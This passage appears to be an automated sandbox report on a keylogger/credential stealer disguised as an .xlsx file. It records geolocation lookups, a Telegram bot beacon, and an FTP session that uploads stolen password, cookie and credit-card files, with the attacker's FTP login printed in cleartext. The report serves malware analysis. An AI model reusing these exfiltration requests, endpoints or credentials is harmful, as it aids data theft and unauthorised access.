                                                    2024-07-17 12:17:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449742188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-07-17 12:17:08 UTC712INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:08 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52986
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2rnX%2F3ZIMtZVtvHk0m%2BXv%2FxprHsQEaxqqvzBv8vCvBcQYQv2VNPjXC7IVIMWfe%2Bds3cjVw%2B9eaWRGeV4IDNVRevTLaPVfwjg9F7Y%2F3KajRk8tCXPTlROXltHHQ3s7ceVwaqNsI2E"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ace4ba1c42a-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449745188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:10 UTC710INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:10 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52988
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gX4Ik%2FLREQwhf3M7J51osrR6KGyjzwZTgLV63sPENHJy1wTLycV8Pd84mlMcxfMNMhs%2FqZcNLovHkK9cSaYjLcxBgJDlfHFVv34%2BDHawMTImJTGXVvOLGDZMt%2FA%2FrcNFbKYMULNy"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ad6cdd73342-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449747188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-07-17 12:17:11 UTC716INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:11 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52989
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEjPgkGFxvc85YSPaOWCZ2wgc5Xup3xuE0kN%2BvmOgMarh%2B%2BIUsXDrXiNwz%2FG3fap%2B%2Bw540R7%2BuTmZqWYHXZjUFMltlgnk8Cy7zVQYb1LeIRMScNu1FxxZrXQOtC7dZ96JOh4%2FRYb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2addaa870cc1-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449749188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:12 UTC704INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:12 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52990
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0gG7qdA0KmDCXeXCdQhmDu%2BVUZWwiNTPESRor94zKa3NYjLA9TjTDCPhOktIQGdad5jK4VQlknCPePIO3d2jokch9vkB0btoq15wYb3P%2FBXswkO45ueS7soVxRLBGHJQkUJUUcP"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ae47e511a30-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449751188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:13 UTC704INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:13 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52991
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvwN%2BcpMuE52VPOBINtl4mhc5Vneb5%2Fjb7mEBEf1QXGPC5KIAlzCZBPbvNWeGvsMiLwSfKaOepRYreKNOdecvJewdpiPs6QwfubgTYMX729uPImJsWx0F6OiOEHHGfGwGx1wZmol"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2aed780a4307-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449752149.154.167.2204432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:14 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                    Host: api.telegram.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:14 UTC344INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0
                                                    Date: Wed, 17 Jul 2024 12:17:14 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 55
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    2024-07-17 12:17:14 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                    FTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Jul 17, 2024 14:17:21.064588070 CEST2149756213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21.220-This is a private system - No anonymous login
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                    Jul 17, 2024 14:17:21.064830065 CEST4975621192.168.2.4213.189.52.181USER f2243_axaabu
                                                    Jul 17, 2024 14:17:21.257766008 CEST2149756213.189.52.181192.168.2.4331 User f2243_axaabu OK. Password required
                                                    Jul 17, 2024 14:17:21.258104086 CEST4975621192.168.2.4213.189.52.181PASS Realak980#
                                                    Jul 17, 2024 14:17:21.524398088 CEST2149756213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                                                    Jul 17, 2024 14:17:21.714761972 CEST2149756213.189.52.181192.168.2.4504 Unknown command
                                                    Jul 17, 2024 14:17:21.714934111 CEST4975621192.168.2.4213.189.52.181PWD
                                                    Jul 17, 2024 14:17:21.904567957 CEST2149756213.189.52.181192.168.2.4257 "/" is your current location
                                                    Jul 17, 2024 14:17:21.904773951 CEST4975621192.168.2.4213.189.52.181TYPE I
                                                    Jul 17, 2024 14:17:22.450741053 CEST2149756213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                                                    Jul 17, 2024 14:17:22.450953007 CEST4975621192.168.2.4213.189.52.181PASV
                                                    Jul 17, 2024 14:17:22.451524973 CEST2149756213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                                                    Jul 17, 2024 14:17:22.642566919 CEST2149756213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,250,212)
                                                    Jul 17, 2024 14:17:22.648998976 CEST4975621192.168.2.4213.189.52.181STOR xlxabu562258 - Passwords ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:23.204821110 CEST2149756213.189.52.181192.168.2.4150 Accepted data connection
                                                    Jul 17, 2024 14:17:23.420774937 CEST2149756213.189.52.181192.168.2.4226-File successfully transferred
                                                    226-File successfully transferred226 0.204 seconds (measured here), 1.64 Kbytes per second
                                                    Jul 17, 2024 14:17:24.930371046 CEST4975621192.168.2.4213.189.52.181PASV
                                                    Jul 17, 2024 14:17:25.396604061 CEST2149756213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,250,119)
                                                    Jul 17, 2024 14:17:25.398139954 CEST2149756213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,250,119)
                                                    Jul 17, 2024 14:17:25.402735949 CEST4975621192.168.2.4213.189.52.181STOR xlxabu562258 - Cookies ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:25.970232964 CEST2149756213.189.52.181192.168.2.4150 Accepted data connection
                                                    Jul 17, 2024 14:17:26.328495979 CEST2149756213.189.52.181192.168.2.4226-File successfully transferred
                                                    226-File successfully transferred226 0.198 seconds (measured here), 33.49 Kbytes per second
                                                    Jul 17, 2024 14:17:27.837539911 CEST4975621192.168.2.4213.189.52.181PASV
                                                    Jul 17, 2024 14:17:28.034118891 CEST2149756213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,246,38)
                                                    Jul 17, 2024 14:17:28.039921999 CEST4975621192.168.2.4213.189.52.181STOR xlxabu562258 - CreditCard ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:28.701682091 CEST2149756213.189.52.181192.168.2.4150 Accepted data connection
                                                    Jul 17, 2024 14:17:28.901737928 CEST2149756213.189.52.181192.168.2.4226-File successfully transferred
                                                    226-File successfully transferred226 0.300 seconds (measured here), 1.14 Kbytes per second

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:08:17:00
                                                    Start date:17/07/2024
                                                    Path:C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                                                    Imagebase:0x9c0000
                                                    File size:739'328 bytes
                                                    MD5 hash:6FD5C95F3BC8AC876F1BABED1B839DCD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:08:17:00
                                                    Start date:17/07/2024
                                                    Path:C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                                                    Imagebase:0x40000
                                                    File size:739'328 bytes
                                                    MD5 hash:6FD5C95F3BC8AC876F1BABED1B839DCD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:43
                                                      Total number of Limit Nodes:8
                                                      execution_graph 25226 723ae88 25227 723b013 25226->25227 25228 723aeae 25226->25228 25228->25227 25230 7239014 25228->25230 25231 723b108 PostMessageW 25230->25231 25232 723b174 25231->25232 25232->25228 25233 2b5a598 25237 2b5a690 25233->25237 25245 2b5a680 25233->25245 25234 2b5a5a7 25238 2b5a6a1 25237->25238 25239 2b5a6c4 25237->25239 25238->25239 25253 2b5a928 25238->25253 25257 2b5a91a 25238->25257 25239->25234 25240 2b5a6bc 25240->25239 25241 2b5a8c8 GetModuleHandleW 25240->25241 25242 2b5a8f5 25241->25242 25242->25234 25246 2b5a6a1 25245->25246 25248 2b5a6c4 25245->25248 25246->25248 25251 2b5a928 LoadLibraryExW 25246->25251 25252 2b5a91a LoadLibraryExW 25246->25252 25247 2b5a6bc 25247->25248 25249 2b5a8c8 GetModuleHandleW 25247->25249 25248->25234 25250 2b5a8f5 25249->25250 25250->25234 25251->25247 25252->25247 25254 2b5a93c 25253->25254 25255 2b5a961 25254->25255 25261 2b5a118 25254->25261 25255->25240 25258 2b5a93c 25257->25258 25259 2b5a961 25258->25259 25260 2b5a118 LoadLibraryExW 25258->25260 25259->25240 25260->25259 25262 2b5ab08 LoadLibraryExW 25261->25262 25264 2b5ab81 25262->25264 25264->25255 25265 2b5c918 25266 2b5c95e 25265->25266 25267 2b5ca4b 25266->25267 25270 2b5cae9 25266->25270 25273 2b5caf8 25266->25273 25272 2b5cb26 25270->25272 25276 2b5bde0 25270->25276 25272->25267 25274 2b5bde0 DuplicateHandle 25273->25274 25275 2b5cb26 25274->25275 25275->25267 25277 2b5cb60 DuplicateHandle 25276->25277 25278 2b5cbf6 25277->25278 25278->25272

                                                      Executed Functions

                                                      Function 02B5A690 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 529 2b5a690-2b5a69f 530 2b5a6a1-2b5a6ae call 2b586ac 529->530 531 2b5a6cb-2b5a6cf 529->531 538 2b5a6c4 530->538 539 2b5a6b0 530->539 532 2b5a6d1-2b5a6db 531->532 533 2b5a6e3-2b5a724 531->533 532->533 540 2b5a726-2b5a72e 533->540 541 2b5a731-2b5a73f 533->541 538->531 584 2b5a6b6 call 2b5a928 539->584 585 2b5a6b6 call 2b5a91a 539->585 540->541 543 2b5a741-2b5a746 541->543 544 2b5a763-2b5a765 541->544 542 2b5a6bc-2b5a6be 542->538 545 2b5a800-2b5a8c0 542->545 547 2b5a751 543->547 548 2b5a748-2b5a74f call 2b5a0bc 543->548 546 2b5a768-2b5a76f 544->546 579 2b5a8c2-2b5a8c5 545->579 580 2b5a8c8-2b5a8f3 GetModuleHandleW 545->580 550 2b5a771-2b5a779 546->550 551 2b5a77c-2b5a783 546->551 549 2b5a753-2b5a761 547->549 548->549 549->546 550->551 554 2b5a785-2b5a78d 551->554 555 2b5a790-2b5a799 call 2b5a0cc 551->555 554->555 560 2b5a7a6-2b5a7ab 555->560 561 2b5a79b-2b5a7a3 555->561 562 2b5a7ad-2b5a7b4 560->562 563 2b5a7c9-2b5a7d6 560->563 561->560 562->563 565 2b5a7b6-2b5a7c6 call 2b5a0dc call 2b5a0ec 562->565 570 2b5a7f9-2b5a7ff 563->570 571 2b5a7d8-2b5a7f6 563->571 565->563 571->570 579->580 581 2b5a8f5-2b5a8fb 580->581 582 2b5a8fc-2b5a910 580->582 581->582 